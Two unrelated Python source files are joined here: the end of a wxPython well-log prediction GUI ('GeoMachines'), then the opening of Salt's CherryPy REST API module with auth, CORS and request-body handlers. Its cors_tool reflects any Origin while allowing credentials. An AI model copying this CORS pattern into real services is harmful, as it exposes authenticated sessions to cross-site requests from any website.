            if title == 'Current well - Pre-processed':
                if filename in self.welllogs_pre:
                    welllog_pre = self.welllogs_pre[filename]
                    preprocessed = True
                else:
                    progressdialog.Update(100)
                    progressdialog.Close()
                    return wx.MessageBox('There is no pre-processed log for this well.', "Warning", wx.OK | wx.ICON_WARNING)
                preparamstr = PrepareStringStatus(self.preprocessing_pars[filename])
            # Pull any previously cached predictions so they stay on the plot.
            if filename in self.welllogs_gardner:
                welllog_gardner = self.welllogs_gardner[filename]
                welllog_gardner_error = self.welllogs_gardner_error[filename]
            if filename in self.welllogs_ffnn:
                welllog_ffnn = self.welllogs_ffnn[filename]
                welllog_ffnn_error = self.welllogs_ffnn_error[filename]
            if filename in self.welllogs_random_forest:
                welllog_random_forest = self.welllogs_random_forest[filename]
                welllog_random_forest_error = self.welllogs_random_forest_error[filename]
            if 'FFNN' in model_name:
                progressdialog.Update(50)
                # The FFNN runs in a spawned subprocess (see the
                # set_start_method('spawn') call at import time) and returns
                # {'log': ..., 'error': ...} through the queue.
                queue = multiprocessing.Queue()
                if preprocessed:
                    p1 = multiprocessing.Process(target=ffnn_predict, args=(queue,welllog_pre,))
                else:
                    p1 = multiprocessing.Process(target=ffnn_predict, args=(queue,welllog_orig,))
                p1.start()
                result = queue.get()
                p1.join()
                welllog_ffnn = result['log']
                welllog_ffnn_error = result['error']
                self.welllogs_ffnn[filename] = welllog_ffnn
                self.welllogs_ffnn_error[filename] = welllog_ffnn_error
                progressdialog.Update(80)
            elif 'Random Forest' in model_name:
                progressdialog.Update(50)
                if preprocessed:
                    welllog_random_forest,welllog_random_forest_error = random_forest_predict(welllog_pre)
                else:
                    welllog_random_forest,welllog_random_forest_error = random_forest_predict(welllog_orig)
                self.welllogs_random_forest[filename] = welllog_random_forest
                self.welllogs_random_forest_error[filename] = welllog_random_forest_error
                progressdialog.Update(80)
            elif 'Gardner' in model_name:
                progressdialog.Update(50)
                if preprocessed:
                    welllog_gardner,welllog_gardner_error = gardner_predict(welllog_pre)
                else:
                    welllog_gardner,welllog_gardner_error = gardner_predict(welllog_orig)
                self.welllogs_gardner[filename] = welllog_gardner
                self.welllogs_gardner_error[filename] = welllog_gardner_error
                progressdialog.Update(80)
            else:
                # Covers the 'ML (RNN)' menu entry, which has no implementation.
                progressdialog.Update(100)
                progressdialog.Close()
                return wx.MessageBox('The selected model is not available.', "Warning", wx.OK | wx.ICON_WARNING)
            errorstr = PrepareStringError(welllog_ffnn_error,welllog_random_forest_error,welllog_gardner_error)
            fig,axes = self.plotter.update(filename,self.plotter.nb.GetSelection())
            fig.gca()
            plotLogs(filename,fig,axes ,welllog_orig, welllog_pre=welllog_pre, welllog_ffnn=welllog_ffnn,welllog_random_forest=welllog_random_forest,welllog_gardner=welllog_gardner,paramstr=preparamstr,errorstr=errorstr)
            self.plotter.RefreshPlot(self.plotter.nb.GetSelection())
            progressdialog.Update(100)
            progressdialog.Close()
        return
##############################################################################
# MAIN PANEL - RIGHT
##############################################################################
class Plot(wx.Panel):
    """wx panel holding a matplotlib figure with six log-track subplots
    (all sharing the depth/y axis), a canvas, and a navigation toolbar."""

    def __init__(self, parent, id=-1, dpi=None, **kwargs):
        wx.Panel.__init__(self, parent, id=id, **kwargs)
        self.figure = figure.Figure(dpi=dpi, figsize=(20, 20))
        self._build_axes()
        self.canvas = FigureCanvas(self, -1, self.figure)
        self.toolbar = NavigationToolbar(self.canvas)
        self.toolbar.Realize()
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(self.canvas , 1, wx.EXPAND)
        sizer.Add(self.toolbar , 0, wx.LEFT | wx.EXPAND)
        self.SetSizer(sizer)

    def _build_axes(self, subplots=6):
        """(Re)create the track axes; tracks after the first share the
        first track's y axis so depth stays aligned across all columns.

        Previously this loop was duplicated verbatim in __init__ and
        clear(); it is factored out so the two stay in sync.
        """
        self.axes = []
        for i in range(1, subplots + 1):
            if i == 1:
                self.axes.append(self.figure.add_subplot(1, subplots, i))
            else:
                self.axes.append(self.figure.add_subplot(1, subplots, i, sharey=self.axes[0]))

    def clear(self):
        """Wipe the whole figure and rebuild the empty shared-y axes."""
        self.figure.clf()
        self._build_axes()
class PlotNotebook(wx.Panel):
    """Tabbed (AUI notebook) container of Plot pages, one tab per well."""

    def __init__(self, parent, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.nb = aui.AuiNotebook(self)
        layout = wx.BoxSizer()
        layout.Add(self.nb, 1, wx.EXPAND)
        self.SetSizer(layout)

    def add(self, name="plot"):
        """Append a new Plot tab titled *name* and return its (figure, axes).

        The initial placeholder tab titled 'empty' is removed as soon as a
        real page is added.
        """
        fresh_page = Plot(self.nb)
        if self.nb.GetPageCount() > 0 and self.nb.GetPageText(0) == 'empty':
            self.nb.DeletePage(0)
        self.nb.AddPage(fresh_page, name)
        return fresh_page.figure, fresh_page.axes

    def update(self, name, page_number):
        """Clear the page at *page_number* and return its (figure, axes)
        ready to be re-drawn."""
        existing_page = self.nb.GetPage(page_number)
        existing_page.clear()
        return existing_page.figure, existing_page.axes

    def RefreshPlot(self, page_number):
        """Force a redraw of the canvas on the page at *page_number*."""
        self.nb.GetPage(page_number).canvas.draw()
##############################################################################
# LATERAL BAR - LEFT
##############################################################################
class BasicControls(wx.Panel):
    """Left-hand control bar: stacks the import, QC, pre-processing, ML and
    export sub-panels vertically. The QC/PrePros/ML panels are kept as
    attributes because mainFrame reads their widget selections directly."""
    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
        font.SetPointSize(9)
        #CREATE CONTROLS SUBPANELS
        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox1 = wx.BoxSizer(wx.HORIZONTAL)
        vbox1.Add(ImportPanel(self,mainframe), flag=wx.EXPAND, border=2)
        vbox.Add(vbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
        vbox.Add((-1, 7))
        vbox2 = wx.BoxSizer(wx.HORIZONTAL)
        self.QCPanel = QCPanel(self,mainframe)
        vbox2.Add(self.QCPanel, flag=wx.EXPAND, border=2)
        vbox.Add(vbox2, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
        vbox.Add((-1, 7))
        vbox3 = wx.BoxSizer(wx.HORIZONTAL)
        self.PreProsPanel = PreProsPanel(self,mainframe)
        vbox3.Add(self.PreProsPanel, flag=wx.EXPAND, border=2)
        vbox.Add(vbox3, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
        vbox.Add((-1, 7))
        vbox4 = wx.BoxSizer(wx.HORIZONTAL)
        self.MLPanel = MLPanel(self,mainframe)
        vbox4.Add(self.MLPanel, flag=wx.EXPAND, border=2)
        vbox.Add(vbox4, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
        vbox.Add((-1, 7))
        vbox5 = wx.BoxSizer(wx.HORIZONTAL)
        vbox5.Add(ExportPanel(self,mainframe), flag=wx.EXPAND, border=2)
        vbox.Add(vbox5, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
        self.SetSizer(vbox)
class ImportPanel(wx.Panel):
    """Control-bar section exposing the 'Import well logs...' button, which
    triggers mainframe.OnImport."""

    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.SetBackgroundColour('white')
        self.mainframe = mainframe
        column = wx.BoxSizer(wx.VERTICAL)
        column.SetMinSize(200, 20)
        column.AddSpacer(5)
        column.Add(wx.StaticText(self, label='- Data loading -'), flag=wx.RIGHT, border=2)
        column.AddSpacer(5)
        import_btn = wx.Button(self, label='Import well logs...')
        import_btn.Bind(wx.EVT_BUTTON, self.mainframe.OnImport)
        column.Add(import_btn, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        column.AddSpacer(5)
        self.SetSizer(column)
class QCPanel(wx.Panel):
    """Quality-control section: a data-set choice (current/all wells,
    original/pre-processed) read by mainFrame.OnCrossPlot, plus the button
    that launches the cross plots."""
    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.SetBackgroundColour('white')
        self.mainframe = mainframe
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.SetMinSize(200,20)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, label='- Quality Control -'), flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(5)
        # These strings are matched verbatim in mainFrame.OnCrossPlot.
        self.choice = wx.Choice(self, choices=['Current well - Original',
                                               'Current well - Pre-processed',
                                               'All wells - Original',
                                               'All wells - Pre-processed'])
        self.choice.SetSelection(0)
        sizer.Add(self.choice, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        button = wx.Button(self, label='Generate CrossPlots')
        button.Bind(wx.EVT_BUTTON, self.mainframe.OnCrossPlot)
        sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
class PreProsPanel(wx.Panel):
    """Pre-processing section: target choice plus the cut / median-filter /
    DBSCAN controls, all read by mainFrame.OnPrePross when 'Apply' is
    pressed. Widget attributes are part of the panel's interface."""
    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.SetBackgroundColour('white')
        self.mainframe = mainframe
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.SetMinSize(200,20)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, label='- Pre-processing -'), flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(2)
        # These strings are matched verbatim in mainFrame.OnPrePross.
        self.choice = wx.Choice(self, choices=['Current well - Original',
                                               'All wells - Original'])
        self.choice.SetSelection(0)
        sizer.Add(self.choice, proportion=1, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(5)
        # Top-cut controls (meters removed from the start of the log).
        self.checkbox_cut = wx.CheckBox(self, label='Cut log (in meters):')
        sizer.Add(self.checkbox_cut, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(2)
        self.spinctrl_cut = wx.SpinCtrl(self, initial=0, min=0,max=1000)
        sizer.Add(self.spinctrl_cut, proportion=1, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(20)
        # Median despike controls (kernel size in samples; forced odd by OnPrePross).
        self.checkbox_median = wx.CheckBox(self, label='Median filter (in samples):')
        sizer.Add(self.checkbox_median, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(2)
        self.spinctrl_median = wx.SpinCtrl(self, initial=21, min=3,max=101)
        sizer.Add(self.spinctrl_median, proportion=1, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(20)
        # DBSCAN outlier-removal controls (eps and min_samples).
        self.checkbox_dbscan = wx.CheckBox(self, label='Outlier detector (DBScan):')
        sizer.Add(self.checkbox_dbscan, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(2)
        sizer.Add(wx.StaticText(self, label='EPS:'), flag=wx.ALIGN_LEFT, border=2)
        # self.spinctrl_eps = wx.SpinCtrlDouble(self, initial=0.15, min=0.10,max=10.00, inc=0.05)
        self.spinctrl_eps = wx.SpinCtrlDouble(self, initial=0.30, min=0.10,max=10.00, inc=0.05)
        sizer.Add(self.spinctrl_eps, proportion=1, flag=wx.ALIGN_LEFT, border=2)
        sizer.Add(wx.StaticText(self, label='Minimum neighbors:'), flag=wx.ALIGN_LEFT, border=2)
        # self.spinctrl_minneigh = wx.SpinCtrl(self, initial=64, min=3,max=100)
        self.spinctrl_minneigh = wx.SpinCtrl(self, initial=30, min=3,max=100)
        sizer.Add(self.spinctrl_minneigh, proportion=1, flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(20)
        button = wx.Button(self, label='Apply')
        button.Bind(wx.EVT_BUTTON, self.mainframe.OnPrePross)
        sizer.Add(button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
class MLPanel(wx.Panel):
    """Sonic-log prediction section: data-set and model choices read by
    mainFrame.OnPredictLog, plus the 'Predict log' button."""
    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.SetBackgroundColour('white')
        self.mainframe = mainframe
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.SetMinSize(200,20)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, label='- Sonic log prediction -'), flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(5)
        # These strings are matched verbatim in mainFrame.OnPredictLog.
        self.choicewells = wx.Choice(self, choices=['Current well - Original',
                                                    'Current well - Pre-processed',
                                                    ])
        self.choicewells.SetSelection(0)
        sizer.Add(self.choicewells, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, label='Select model:'), flag=wx.ALIGN_LEFT, border=2)
        sizer.AddSpacer(2)
        # OnPredictLog matches on substrings ('FFNN', 'Random Forest', 'Gardner');
        # 'ML (RNN)' has no implementation and falls into its warning branch.
        self.choicemodel = wx.Choice(self, choices=['Empirical (Gardner)',
                                                    'ML (FFNN)',
                                                    'ML (Random Forest)',
                                                    'ML (RNN)'
                                                    ])
        self.choicemodel.SetSelection(0)
        sizer.Add(self.choicemodel, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        sizerh = wx.BoxSizer(wx.HORIZONTAL)
        predict_button = wx.Button(self, label='Predict log')
        predict_button.Bind(wx.EVT_BUTTON, self.mainframe.OnPredictLog)
        sizerh.Add(predict_button, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.Add(sizerh, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
class ExportPanel(wx.Panel):
    """Control-bar section exposing the 'Export well log...' button, which
    triggers mainframe.OnExport."""

    def __init__(self, parent, mainframe, id=-1):
        wx.Panel.__init__(self, parent, id=id)
        self.parent = parent
        self.SetBackgroundColour('white')
        self.mainframe = mainframe
        column = wx.BoxSizer(wx.VERTICAL)
        column.SetMinSize(200, 20)
        column.AddSpacer(5)
        column.Add(wx.StaticText(self, label='- Export Data -'), flag=wx.RIGHT, border=2)
        column.AddSpacer(5)
        export_btn = wx.Button(self, label='Export well log...')
        export_btn.Bind(wx.EVT_BUTTON, self.mainframe.OnExport)
        column.Add(export_btn, proportion=1, flag=wx.ALIGN_RIGHT, border=2)
        column.AddSpacer(5)
        self.SetSizer(column)
##############################################################################
# MAIN FUNCTION;
##############################################################################
def main():
    """Create the wx application and open the GeoMachines main window."""
    app = wx.App()
    app.SetAppName('GeoMachines')
    window = mainFrame(None, -1, 'GeoMachines', size=wx.Size(1600, 800))
    window.Show()
    app.MainLoop()


if __name__ == "__main__":
    main()
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Versions 3.2.{2,3,4} are strongly
recommended due to a known `SSL error
<https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:configuration:
All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
    from .tools import websockets
    from . import event_processor

    HAS_WEBSOCKETS = True
except ImportError:
    # The websocket dependencies are optional. Provide a stub namespace so
    # attribute access such as ``websockets.SynchronizingWebsocket`` remains
    # valid; consumers must check HAS_WEBSOCKETS before using the feature.
    websockets = type('websockets', (object,), {
        'SynchronizingWebsocket': None,
    })

    HAS_WEBSOCKETS = False
def html_override_tool():
    '''
    Bypass the normal handler and serve HTML for all URLs

    The ``app_path`` setting must be non-empty and the request must ask for
    ``text/html`` in the ``Accept`` header.
    '''
    opts = cherrypy.config['apiopts']
    req = cherrypy.request

    # Nothing to do unless an HTML application is configured.
    if 'app' not in opts:
        return

    # Never redirect requests already aimed at the app or its static assets.
    excluded_prefixes = (
        opts.get('app_path', '/app'),
        opts.get('static_path', '/static'),
    )
    if req.path_info.startswith(excluded_prefixes):
        return

    # A wildcard Accept header is treated as an API client, not a browser.
    if req.headers.get('Accept') == '*/*':
        return

    try:
        preferred = cherrypy.lib.cptools.accept('text/html')
    except cherrypy.HTTPError:
        return

    if preferred != 'text/html':
        return

    raise cherrypy.InternalRedirect(opts.get('app_path', '/app'))
def salt_token_tool():
    '''
    Copy a supplied ``X-Auth-Token`` header into the session cookie dict so
    the rest of the session-based auth machinery works as intended
    '''
    token_header = cherrypy.request.headers.get('X-Auth-Token', None)
    if not token_header:
        return

    # The explicit header takes precedence over any existing session cookie.
    cherrypy.request.cookie['session_id'] = token_header
def salt_ip_verify_tool():
    '''
    If there is a list of restricted IPs, verify current
    client is coming from one of those IPs.
    '''
    # This is overly cumbersome and crude,
    # But, it's also safe... ish...
    salt_config = cherrypy.config.get('saltopts', None)
    if not salt_config:
        return

    cherrypy_conf = salt_config.get('rest_cherrypy', None)
    if not cherrypy_conf:
        return

    auth_ip_list = cherrypy_conf.get('authorized_ips', None)
    if not auth_ip_list:
        return

    logger.debug("Found IP list: {0}".format(auth_ip_list))
    rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
    logger.debug("Request from IP: {0}".format(rem_ip))

    if rem_ip in auth_ip_list:
        return

    # Client is not in the allow-list; deny with a 403 payload.
    logger.error("Blocked IP: {0}".format(rem_ip))
    cherrypy.response.status = 403
    return {
        'status': cherrypy.response.status,
        'return': "Bad IP",
    }
def salt_auth_tool():
    '''
    Reject unauthenticated requests with a 401 response

    A request counts as authenticated once its session carries a Salt token.
    '''
    session = cherrypy.session
    if 'token' not in session:  # pylint: disable=W8601
        raise cherrypy.HTTPError(401)

    # Authenticated responses are user-specific; keep shared caches out.
    cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
    '''
    Check a CORS preflight request and return a valid response
    '''
    request_headers = cherrypy.request.headers
    response_headers = cherrypy.response.headers

    permitted_methods = ['GET', 'POST']
    permitted_headers = ['X-Auth-Token', 'Content-Type']

    # Only advertise CORS capabilities for methods we actually allow.
    requested_method = request_headers.get('Access-Control-Request-Method', None)
    if requested_method in permitted_methods:
        response_headers['Access-Control-Allow-Methods'] = ', '.join(permitted_methods)
        response_headers['Access-Control-Allow-Headers'] = ', '.join(permitted_headers)
        response_headers['Connection'] = 'keep-alive'
        response_headers['Access-Control-Max-Age'] = '1400'

    # Preflight responses carry no body.
    return {}
def cors_tool():
    '''
    Handle both simple and complex CORS requests

    Add CORS headers to each response. If the request is a CORS preflight
    request swap out the default handler with a simple, single-purpose handler
    that verifies the request and provides a valid CORS response.
    '''
    incoming = cherrypy.request.headers
    outgoing = cherrypy.response.headers

    # Headers required for 'simple' CORS go on every response.
    outgoing['Access-Control-Allow-Origin'] = incoming.get('Origin', '*')
    outgoing['Access-Control-Expose-Headers'] = 'GET, POST'
    outgoing['Access-Control-Allow-Credentials'] = 'true'

    # Non-simple (preflight) requests are answered by a dedicated handler.
    if cherrypy.request.method == 'OPTIONS':
        cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference. NOTE(review): ordering is fed to
# cherrypy.lib.cptools.accept() in hypermedia_handler — confirm the first
# entry is the effective default for ambiguous Accept headers.
ct_out_map = (
    ('application/json', json.dumps),
    ('application/x-yaml', functools.partial(
        yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
    '''
    Determine the best output format based on the Accept header, execute the
    regular handler, and transform the output to the request content type (even
    if it's an error).

    :param args: Pass args through to the main handler
    :param kwargs: Pass kwargs through to the main handler
    '''
    # Execute the real handler. Handle or pass-through any errors we know how
    # to handle (auth & HTTP errors). Reformat any errors we don't know how to
    # handle as a data structure.
    try:
        cherrypy.response.processors = dict(ct_out_map)
        ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
    except (salt.exceptions.EauthAuthenticationError,
            salt.exceptions.TokenAuthenticationError):
        raise cherrypy.HTTPError(401)
    except (salt.exceptions.SaltDaemonNotRunning,
            salt.exceptions.SaltReqTimeoutError) as exc:
        raise cherrypy.HTTPError(503, exc.strerror)
    except cherrypy.CherryPyException:
        raise
    except Exception as exc:
        import traceback

        logger.debug("Error while processing request for: %s",
                     cherrypy.request.path_info,
                     exc_info=True)

        cherrypy.response.status = 500

        # Bug fix: traceback.format_exc() takes an optional traceback *limit*,
        # not the exception instance; passing ``exc`` relied on Py2's
        # arbitrary cross-type comparison and breaks on Py3.
        ret = {
            'status': cherrypy.response.status,
            'return': traceback.format_exc()
            if cherrypy.config['debug']
            else "An unexpected error occurred"}

    # Raises 406 if requested content-type is not supported
    best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])

    # Transform the output from the handler into the requested output format
    cherrypy.response.headers['Content-Type'] = best
    out = cherrypy.response.processors[best]
    return out(ret)
def hypermedia_out():
    '''
    Install :func:`hypermedia_handler` in front of the normal page handler

    The original handler is stashed on the request object so the wrapper can
    invoke it and then serialize its output into the negotiated content type.
    '''
    active_request = cherrypy.serving.request
    active_request._hypermedia_inner_handler = active_request.handler
    active_request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False

    :param fn: the body-processor function to wrap
    :return: the wrapped processor

    Bug fix: ``functools.wraps`` must be applied to the *wrapper* with the
    wrapped function as its argument. The previous bare ``@functools.wraps``
    on this factory turned it into ``functools.wraps(process_request_body)``,
    which simply copied metadata onto each decorated processor and returned
    it unwrapped — so the ``process_request_body`` guard below never ran.
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
    '''
    Accept x-www-form-urlencoded data (run through CherryPy's formatter)
    and reformat it into a Low State data structure.

    Since we can't easily represent complicated data structures with
    key-value pairs, any more complicated requirements (e.g. compound
    commands) must instead be delivered via JSON or YAML.

    For example:

    .. code-block:: bash

        curl -si localhost:8000 -d client=local -d tgt='*' \\
            -d fun='test.kwarg' -d arg='one=1' -d arg='two=2'

    :param entity: raw POST data
    '''
    # Let CherryPy's stock urlencoded parser populate ``entity.params``.
    cherrypy._cpreqbody.process_urlencoded(entity)

    active_request = cherrypy.serving.request
    active_request.unserialized_data = entity.params
    active_request.raw_body = ''
@process_request_body
def json_processor(entity):
    '''
    Unserialize raw POST data in JSON format to a Python data structure.

    :param entity: raw POST data
    '''
    payload = entity.fp.read()

    try:
        parsed = json.loads(payload)
    except ValueError:
        raise cherrypy.HTTPError(400, 'Invalid JSON document')

    cherrypy.serving.request.unserialized_data = parsed
    cherrypy.serving.request.raw_body = payload
@process_request_body
def yaml_processor(entity):
    '''
    Unserialize raw POST data in YAML format to a Python data structure.

    :param entity: raw POST data
    :raises HTTPError: 400 if the body is not a valid YAML document
    '''
    body = entity.fp.read()
    try:
        cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
    except (ValueError, yaml.YAMLError):
        # Bug fix: PyYAML reports malformed documents via yaml.YAMLError
        # subclasses (ScannerError, ParserError), not ValueError. Catching
        # only ValueError let parse failures escape as an unhandled 500
        # instead of the intended 400.
        raise cherrypy.HTTPError(400, 'Invalid YAML document')
    cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
    '''
    Attempt to unserialize plain text as JSON

    Some large services still send JSON with a text/plain Content-Type. Those
    services are bad and should feel bad.

    :param entity: raw POST data
    '''
